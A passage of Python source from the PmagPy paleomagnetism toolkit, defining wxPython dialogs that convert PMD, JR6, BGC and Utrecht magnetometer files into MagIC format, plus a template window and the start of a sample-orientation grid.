self.on_add_dir_button)\n\n #---sizer 2 ----\n ncn_keys = ['XXXXY', 'XXXX-YY', 'XXXX.YY', 'XXXX[YYY] where YYY is sample designation, enter number of Y', 'sample name=site name', 'Site is entered under a separate column', '[XXXX]YYY where XXXX is the site name, enter number of X']\n self.bSizer2 = pw.select_ncn(pnl, ncn_keys)\n\n #---sizer 3 ---\n # TEXT = \"specify number of characters to designate a specimen, default = 0\"\n # self.bSizer3 = pw.labeled_text_field(pnl, TEXT)\n self.bSizer3 = pw.specimen_n(pnl)\n\n\n #---sizer 4 ----\n TEXT=\"Location name:\"\n self.bSizer4 = pw.labeled_text_field(pnl, TEXT)\n\n\n #---sizer 5 ----\n\n self.bSizer5 = pw.sampling_particulars(pnl)\n\n #---sizer 6 ---\n self.bSizer6 = pw.replicate_measurements(pnl)\n\n #---sizer 7 ---\n self.bSizer7 = pw.site_lat_lon(pnl)\n\n #---sizer 8 ----\n TEXT=\"Demagnetization Method: t for thermal, af for AF demag (optional):\\nDemag type is automatically detected for files using the H or M labels\\nfor AF demag or the T label for thermal demag in step names.\"\n \n self.bSizer8 = 
pw.labeled_text_field(pnl, TEXT)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options = {}\n WD = self.WD\n options['dir_path'] = WD\n directory = self.bSizer0.return_value() or '.'\n options['input_dir_path'] = directory\n files = os.listdir(directory)\n files = [str(f) for f in files if str(f).upper().endswith('.PMD')]\n if files:\n samp_outfile = files[0][:files[0].find('.')] + files[-1][:files[-1].find('.')] + \"_samples.txt\"\n options['samp_file'] = samp_outfile\n else:\n #raise Exception(\"No pmd files found in {}, try a different directory\".format(WD))\n pw.simple_warning(\"No pmd files found in {}, try a different directory\".format(WD))\n ID = \"-ID \" + directory\n ncn = self.bSizer2.return_value()\n options['samp_con'] = ncn\n spc = self.bSizer3.return_value() or 0\n options['specnum'] = spc\n loc_name = self.bSizer4.return_value()\n options['location'] = loc_name\n dmg = self.bSizer8.return_value().lower() #Make lower case because the dmg options are t or af\n options['dmg'] = dmg\n if dmg != \"\" and dmg != \"t\" and dmg != \"af\":\n pw.simple_warning(\"The only valid demagnetization methods are t and af, but the program received: %s\"%dmg)\n return\n if loc_name:\n location = loc_name\n loc_name = \"-loc \" + loc_name\n particulars = self.bSizer5.return_value()\n options['meth_code'] = particulars\n if particulars:\n particulars = \"-mcd \" + particulars\n try: lat,lon = self.bSizer7.return_value().split()\n except ValueError: lat,lon = '',''\n options['lat'] = lat\n options['lon'] = lon\n lat = '-lat ' + lat\n lon = '-lon ' + lon\n replicate = self.bSizer6.return_value()\n if replicate:\n replicate = ''\n else:\n replicate = '-A'\n options['noave'] = 1 # don't average\n for f in files:\n options['mag_file'] = f\n outfile = f + \".magic\"\n options['meas_file'] = outfile\n spec_outfile = f[:f.find('.')] + \"_specimens.txt\"\n options['spec_file'] = spec_outfile\n samp_outfile = f[:f.find('.')] + \"_samples.txt\"\n options['samp_file'] = samp_outfile\n site_outfile = f[:f.find('.')] + \"_sites.txt\"\n options['site_file'] = site_outfile\n loc_outfile = f[:f.find('.')] + \"_locations.txt\"\n options['loc_file'] = loc_outfile\n COMMAND = \"pmd_magic.py -WD {} -f {} -F {} -Fsp {} -Fsa {} -Fsi {} -Flo {} -dmg {} -ncn {} {} -spc {} {} {} {} {} {}\".format(WD, f, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, dmg, ncn, particulars, spc, replicate, ID, loc_name, lat, lon)\n\n program_ran, error_message = convert.pmd(**options)\n if not program_ran:\n pw.simple_warning(error_message)\n 
return False\n elif files.index(f) == len(files) -1:\n pw.close_window(self, COMMAND, outfile)\n else:\n print(\"Just ran equivalent of Python command: \", COMMAND)\n\n\n def on_helpButton(self, event):\n # to run as module:\n pw.on_helpButton(text=convert.pmd.__doc__)\n\n\nclass convert_JR6_files_to_MagIC(wx.Frame):\n\n \"\"\" \"\"\"\n title = \"PmagPy JR6 file conversion\"\n\n def __init__(self, parent, WD):\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self)\n self.WD = WD\n self.InitUI()\n\n def InitUI(self):\n\n pnl = self.panel\n TEXT = \"JR6 format file (currently .txt format only)\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0a ----\n TEXT = \"JR6 file Type\"\n label1 = \".txt format\"\n label2 = \".jr6 format\"\n self.bSizer0a = pw.labeled_yes_or_no(pnl, TEXT, label1, label2)\n\n #---sizer 0b ---\n self.bSizer0b = pw.check_box(pnl, 'Joides Resolution')\n self.Bind(wx.EVT_CHECKBOX, self.on_check_joides, self.bSizer0b.cb)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, btn_text='add measurement file', method = self.on_add_file_button)\n\n #---sizer 1b ----\n TEXT=\"User (Optional):\"\n self.bSizer1b = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 1c ----\n TEXT=\"Expedition (e.g. 312)\"\n self.bSizer1c = pw.labeled_text_field(pnl, TEXT)\n self.bSizer1c.ShowItems(False)\n\n #---sizer 1d ----\n TEXT=\"Hole name (e.g. U1456A)\"\n self.bSizer1d = pw.labeled_text_field(pnl, TEXT)\n self.bSizer1d.ShowItems(False)\n\n #---sizer 1 ----\n self.bSizer1 = pw.sampling_particulars(pnl)\n\n #---sizer 1a ---\n self.bSizer1a = pw.labeled_text_field(pnl, 'Specimen volume, default is 12 cc.\\nPlease provide volume in cc.')\n\n #---sizer 2 ---\n self.bSizer2 = pw.specimen_n(pnl)\n\n #---sizer 3 ----\n ncn_keys = ['XXXXY', 'XXXX-YY', 'XXXX.YY', 'XXXX[YYY] where YYY is sample designation, enter number of Y', 'sample name=site name']\n self.bSizer3 = pw.select_ncn(pnl, ncn_keys)\n\n #---sizer 4 ----\n TEXT=\"Location name:\"\n self.bSizer4 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 6 ----\n self.bSizer6 = pw.site_lat_lon(pnl)\n\n #---sizer 5 ----\n self.bSizer5 = pw.replicate_measurements(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n hbox0 = wx.BoxSizer(wx.HORIZONTAL)\n hbox0.AddMany([(self.bSizer0a,wx.ALIGN_LEFT|wx.TOP), (self.bSizer0b,wx.ALIGN_LEFT|wx.TOP)])\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(hbox0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1d, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1c, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1b, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1a, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n 
hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_check_joides(self, event):\n if self.bSizer0b.cb.IsChecked():\n self.bSizer0a.ShowItems(False)\n self.bSizer1.ShowItems(False)\n self.bSizer1a.ShowItems(False)\n self.bSizer2.ShowItems(False)\n self.bSizer3.ShowItems(False)\n self.bSizer4.ShowItems(False)\n self.bSizer1b.ShowItems(True)\n self.bSizer1c.ShowItems(True)\n self.bSizer1d.ShowItems(True)\n else:\n self.bSizer1b.ShowItems(False)\n self.bSizer1c.ShowItems(False)\n self.bSizer1d.ShowItems(False)\n self.bSizer0a.ShowItems(True)\n self.bSizer1.ShowItems(True)\n self.bSizer1a.ShowItems(True)\n self.bSizer2.ShowItems(True)\n self.bSizer3.ShowItems(True)\n self.bSizer4.ShowItems(True)\n self.panel.Layout()\n\n def on_add_file_button(self,event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, text)\n\n def on_add_sampfile_button(self, event):\n text = \"choose samples type file\"\n pw.on_add_file_button(self.bSizer0c, text)\n\n def on_okButton(self, event):\n samp_file = ''\n options = {}\n input_format = self.bSizer0a.return_value()\n JR = self.bSizer0b.return_value()\n if input_format:\n input_format = 'txt'\n else:\n input_format = 'jr6'\n output_dir_path = self.WD\n options['dir_path'] = str(output_dir_path)\n input_dir_path, mag_file = os.path.split(self.bSizer0.return_value())\n if not mag_file:\n pw.simple_warning(\"You must select a JR6 format file\")\n return False\n options['input_dir_path'], options['mag_file'] = str(input_dir_path), str(mag_file)\n meas_file = os.path.split(mag_file)[1]+\".magic\"\n options['meas_file'] = str(meas_file)\n spec_file = os.path.split(mag_file)[1]+\"_specimens.txt\"\n options['spec_file'] = str(spec_file)\n samp_file = os.path.split(mag_file)[1]+\"_samples.txt\"\n options['samp_file'] = str(samp_file)\n site_file = os.path.split(mag_file)[1]+\"_sites.txt\"\n options['site_file'] = str(site_file)\n loc_file = os.path.split(mag_file)[1]+\"_locations.txt\"\n options['loc_file'] = str(loc_file)\n specnum = self.bSizer2.return_value()\n options['specnum'] = specnum\n samp_con = self.bSizer3.return_value()\n options['samp_con'] = samp_con\n user = self.bSizer1b.return_value()\n options['user'] = str(user)\n location = self.bSizer4.return_value()\n if location!='':\n options['location'] = str(location)\n expedition = self.bSizer1c.return_value()\n options['expedition'] = str(expedition)\n site = self.bSizer1d.return_value()\n options['site'] = str(site)\n average = self.bSizer5.return_value()\n if average:\n noave = 0\n else:\n noave = 1\n options['noave'] = noave\n meth_code = self.bSizer1.return_value()\n options['meth_code'] = meth_code\n try: lat,lon = self.bSizer6.return_value().split()\n except ValueError: lat,lon = '',''\n options['lat'] = lat\n options['lon'] = lon\n lat,lon = '-lat '+str(lat), '-lon '+str(lon)\n volume = self.bSizer1a.return_value()\n os.chdir(self.WD)\n COMMAND = \"\"\n\n # validate arguments;\n if volume!='':\n try:\n volume = float(volume)\n options['volume'] = volume\n except:\n pw.simple_warning(\"You must provide a valid quantity for volume, or no volume\")\n return False\n\n # validate file type and run jr6_magic:\n if not JR:\n if 'jr6' in input_format and 'jr6' not in mag_file.lower():\n pw.simple_warning(\"You must provide a .jr6 format file\")\n return False\n elif 'txt' in input_format and 'txt' not in mag_file.lower():\n pw.simple_warning(\"You must provide a .txt format 
file\")\n return False\n # remove unneeded options for jr6_txt/jr6_jr6\n for key in ['expedition', 'site']:\n try:\n options.pop(key)\n except KeyError:\n pass\n if input_format == 'txt': # .txt format\n program_ran, error_message = convert.jr6_txt(**options)\n if program_ran:\n COMMAND = \"options={}\\nconvert.jr6_txt(**options)\".format(str(options))\n pw.close_window(self, COMMAND, meas_file)\n else:\n pw.simple_warning(error_message)\n else:\n program_ran, error_message = convert.jr6_jr6(**options)\n if program_ran:\n COMMAND = \"options={}\\nconvert.jr6_jr6(**options)\".format(str(options))\n pw.close_window(self, COMMAND, meas_file)\n else:\n pw.simple_warning(error_message)\n else: # Joides Resolution\n if not mag_file:\n pw.simple_warning('You must provide a valid IODP JR6 file')\n program_ran, error_message = convert.iodp_jr6(**options)\n if program_ran:\n COMMAND = \"options={}\\nconvert.iodp_jr6(**options)\".format(str(options))\n pw.close_window(self, COMMAND, meas_file)\n else:\n pw.simple_warning(error_message)\n\n\n def on_cancelButton(self,event):\n self.Destroy()\n self.Parent.Raise()\n\n def on_helpButton(self, event):\n input_format = self.bSizer0a.return_value()\n if input_format:\n input_format = 'txt'\n else:\n input_format = 'jr6'\n if input_format == 'txt': # .txt format\n pw.on_helpButton(text=jr6_txt_magic.do_help())\n else:\n pw.on_helpButton(text=jr6_jr6_magic.do_help())\n\n\nclass convert_BGC_files_to_magic(wx.Frame):\n\n \"\"\" \"\"\"\n title = \"PmagPy BGC file conversion\"\n\n def __init__(self, parent, WD, title):\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self)\n self.WD = WD\n self.InitUI()\n\n def InitUI(self):\n\n pnl = self.panel\n\n text = \"convert Berkeley Geochronology Center file to MagIC format\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=text), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1a ----\n self.bSizer1a = pw.labeled_text_field(pnl, 'User (Optional):')\n\n #---sizer 1 ----\n self.bSizer1 = pw.labeled_text_field(pnl, 'Location name:')\n\n #---sizer 2 ----\n self.bSizer2 = pw.labeled_text_field(pnl, 'Site name (if using convention bellow leave blank):')\n # sitename\n\n #---sizer 3 ----\n self.bSizer3 = pw.sampling_particulars(pnl)\n # meth codes\n\n #---sizer 4 ----\n self.bSizer4 = pw.replicate_measurements(pnl)\n # average replicates\n\n #---sizer 5 ---\n self.bSizer5 = pw.labeled_text_field(pnl, 'Provide specimen volume in cubic centimeters\\nNote: the volume given in data file will be used unless it equals 0.0 ')\n\n #---sizer 6 ----\n self.bSizer6 = pw.select_ncn(pnl)\n\n #---sizer 7 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer7 = pw.specimen_n(pnl)\n\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1a, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, 
flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.AddSpacer(10)\n #vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_add_file_button(self,event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, text)\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n\n options = {}\n full_file = self.bSizer0.return_value()\n\n ID, infile = os.path.split(full_file)\n options['dir_path'] = self.WD\n options['input_dir_path'] = ID\n options['mag_file'] = infile\n outfile = infile + \".magic\"\n options['meas_file'] = outfile\n spec_outfile = infile + \"_specimens.txt\"\n options['spec_file'] = spec_outfile\n samp_outfile = infile + \"_samples.txt\"\n options['samp_file'] = samp_outfile\n site_outfile = infile + \"_sites.txt\"\n options['site_file'] = site_outfile\n loc_outfile = infile + \"_locations.txt\"\n options['loc_file'] = loc_outfile\n\n user = str(self.bSizer1a.return_value())\n options['user'] = str(user)\n loc_name = str(self.bSizer1.return_value())\n options['location'] = str(loc_name)\n site_name = self.bSizer2.return_value()\n if site_name!='': options['site'] = str(site_name)\n spec_num = self.bSizer7.return_value()\n options['specnum'] = spec_num\n if spec_num:\n spec_num = \"-spc \" + str(spec_num)\n else:\n spec_num = \"-spc 0\" # defaults to 0 if user doesn't choose number\n ncn = self.bSizer6.return_value()\n options['samp_con'] = ncn\n\n meth_code = self.bSizer3.return_value()\n options['meth_code'] = meth_code\n\n average = self.bSizer4.return_value()\n options['noave'] = average\n\n volume = self.bSizer5.return_value()\n if volume:\n try:\n options['volume'] = float(volume)\n except ValueError:\n pw.simple_warning('You must provide a valid numerical value for specimen volume')\n return False\n\n for key, value in list(options.items()):\n print(key, value)\n\n COMMAND = \"options = {}\\nconvert.bgc(**options)\".format(str(options))\n\n if infile=='':\n all_files=[f for f in os.listdir('.') if os.path.isfile(f)]\n outfiles=[]\n for infile in all_files:\n options['mag_file'] = infile\n outfile = infile + \".magic\"\n options['meas_file'] = outfile\n spec_outfile = infile + \"_specimens.txt\"\n options['spec_file'] = spec_outfile\n samp_outfile = infile + \"_samples.txt\"\n options['samp_file'] = samp_outfile\n site_outfile = infile + \"_sites.txt\"\n options['site_file'] = site_outfile\n loc_outfile = infile + \"_locations.txt\"\n options['loc_file'] = loc_outfile\n try:\n program_ran, error_message = convert.bgc(**options)\n except IndexError:\n continue\n if program_ran:\n outfiles.append(outfile)\n outfile = str(outfiles)\n else:\n program_ran, error_message = convert.bgc(**options)\n\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_cancelButton(self,event):\n self.Destroy()\n self.Parent.Raise()\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.bgc.__doc__)\n\nclass convert_Utrecht_files_to_MagIC(convert_files_to_MagIC):\n \"\"\"\n A GUI which allows easy input of meta data required to convert Utrecht\n Magnetometer files into MagIC format for analysis or contribution to the\n EarthRef MagIC 
Archive.\n \"\"\"\n\n def InitUI(self):\n \"\"\"\n Override of InitUI in parent class convert_files_to_MagIC.\n Creates UI for input of relevant data to convert Utrecht to MagIC.\n \"\"\"\n\n pnl = self.panel\n\n TEXT = \"Convert Utrecht Magnetometer file format\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.sampling_particulars(pnl)\n\n #---sizer 2 ----\n self.bSizer2 = pw.select_ncn(pnl)\n\n #---sizer 3 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer3 = pw.specimen_n(pnl)\n\n #---sizer 4 ----\n TEXT=\"Location name:\"\n self.bSizer4 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 5 ---\n self.bSizer5 = pw.replicate_measurements(pnl)\n\n #---sizer 6 ----\n self.bSizer6 = pw.lab_field(pnl)\n\n #---sizer 7 ---\n TEXT= \"use the European date format (dd/mm/yyyy)\"\n self.bSizer7 = pw.check_box(pnl, TEXT)\n\n #---sizer 8 ---\n self.bSizer8 = pw.site_lat_lon(pnl)\n\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_okButton(self, event):\n \"\"\"\n Compiles information input in GUI into a kwargs dictionary which can\n be passed into the utrecht_magic script and run to output magic files\n \"\"\"\n os.chdir(self.WD)\n options_dict = {}\n wd = self.WD\n options_dict['dir_path'] = wd\n full_file = self.bSizer0.return_value()\n if not full_file:\n pw.simple_warning('You must provide a Utrecht format file')\n return False\n input_directory, Utrecht_file = os.path.split(full_file)\n options_dict['mag_file'] = Utrecht_file\n options_dict['input_dir_path'] = input_directory\n if input_directory:\n ID = \"-ID \" + input_directory\n else:\n ID = ''\n outfile = Utrecht_file + \".magic\"\n options_dict['meas_file'] = outfile\n spec_outfile = Utrecht_file[:Utrecht_file.find('.')] + \"_specimens.txt\"\n options_dict['spec_file'] = spec_outfile\n samp_outfile = Utrecht_file[:Utrecht_file.find('.')] + \"_samples.txt\"\n options_dict['samp_file'] = samp_outfile\n site_outfile = Utrecht_file[:Utrecht_file.find('.')] + \"_sites.txt\"\n options_dict['site_file'] = site_outfile\n loc_outfile = Utrecht_file[:Utrecht_file.find('.')] + \"_locations.txt\"\n options_dict['loc_file'] = loc_outfile\n dc_flag,dc_params = '',''\n if self.bSizer6.return_value() != '':\n dc_params = 
list(map(float,self.bSizer6.return_value().split()))\n options_dict['lab_field'] = dc_params[0]\n options_dict['phi'] = dc_params[1]\n options_dict['theta'] = dc_params[2]\n dc_flag = '-dc ' + self.bSizer6.return_value()\n spec_num = self.bSizer3.return_value()\n options_dict['specnum'] = spec_num\n if spec_num:\n spec_num = \"-spc \" + str(spec_num)\n else:\n spec_num = \"-spc 0\" # defaults to 0 if user doesn't choose number\n loc_name = self.bSizer4.return_value()\n options_dict['location'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n ncn = self.bSizer2.return_value()\n options_dict['samp_con'] = ncn\n particulars = self.bSizer1.return_value()\n options_dict['meth_code'] = particulars\n if particulars:\n particulars = \"-mcd \" + particulars\n euro_date = self.bSizer7.return_value()\n if euro_date: options_dict['dmy_flag'] = True; dmy_flag='-dmy'\n else: options_dict['dmy_flag'] = False; dmy_flag=''\n try: lat,lon = self.bSizer8.return_value().split()\n except ValueError: lat,lon = '',''\n options_dict['lat'] = lat\n options_dict['lon'] = lon\n replicate = self.bSizer5.return_value()\n if replicate:\n options_dict['noave'] = True\n replicate = ''\n else:\n options_dict['noave'] = False\n replicate = '-A'\n\n COMMAND = \"utrecht_magic.py -WD {} -f {} -F {} {} {} {} -ncn {} {} -Fsp {} -Fsa {} -Fsi {} -Flo {} {} {} {} -lat {} -lon {}\".format(wd, Utrecht_file, outfile, particulars, spec_num, loc_name, ncn, ID, spec_outfile, samp_outfile, site_outfile, loc_outfile, replicate, dc_flag, dmy_flag, lat, lon)\n # to run as module:\n program_ran, error_message = convert.utrecht(**options_dict)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_helpButton(self, event):\n \"\"\"\n Displays utrecht_magic scripts help message\n \"\"\"\n pw.on_helpButton(text=convert.utrecht.__doc__)\n\n\n# template for an import window\nclass something(wx.Frame):\n\n \"\"\" \"\"\"\n def InitUI(self):\n\n pnl = self.panel\n\n text = \"Hello here is a bunch of text\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=text), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n\n #---sizer 2 ----\n\n #---sizer 3 ----\n\n #---sizer 4 ----\n\n #---sizer 5 ---\n\n #---sizer 6 ----\n\n #---sizer 7 ---\n\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.AddSpacer(10)\n #vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_add_file_button(self,event):\n text = \"choose file to 
convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, self.WD, event, text)\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n COMMAND = \"\"\n pw.run_command_and_close_window(self, COMMAND, outfile)\n\n def on_helpButton(self, event):\n pw.on_helpButton(text='')\n\n\n#=================================================================\n# demag_orient:\n# read/write demag_orient.txt\n# calculate sample orientation\n#=================================================================\n\n\nclass OrientFrameGrid3(wx.Frame):\n def __init__(self, parent, id, title, WD, contribution, size):\n wx.Frame.__init__(self, parent, -1, title, size=size,\n name='calculate geographic directions')\n\n #--------------------\n # initialize stuff\n #--------------------\n self.parent = parent\n if sys.platform in ['win32', 'win64']:\n self.panel = wx.ScrolledWindow(self, style=wx.SIMPLE_BORDER|wx.ALWAYS_SHOW_SB)\n else:\n self.panel = wx.Panel(self, style=wx.SIMPLE_BORDER)\n\n self.WD = WD\n #self.Data_hierarchy = Data_hierarchy\n self.contribution = contribution\n\n # contribution has already propagated measurement data...\n if 'samples' not in self.contribution.tables:\n print('-E- No sample data available')\n samples_name_list = []\n else:\n samples_name_list = self.contribution.tables['samples'].df.index.unique()\n\n self.orient_data = {}\n try:\n fname = os.path.join(self.WD, \"demag_orient.txt\")\n self.orient_data, dtype, keys = pmag.magic_read_dict(fname, sort_by_this_name=\"sample_name\",\n return_keys=True)\n\n except Exception as ex:\n print(\"-W-\", ex)\n\n # re-do the 'quit' binding so that it only closes the current window\n self.parent.Bind(wx.EVT_MENU, lambda event: self.parent.menubar.on_quit(event, self), self.parent.menubar.file_quit)\n\n # self.headers is a list of two-item tuples.\n #the first is the proper column name as understood by 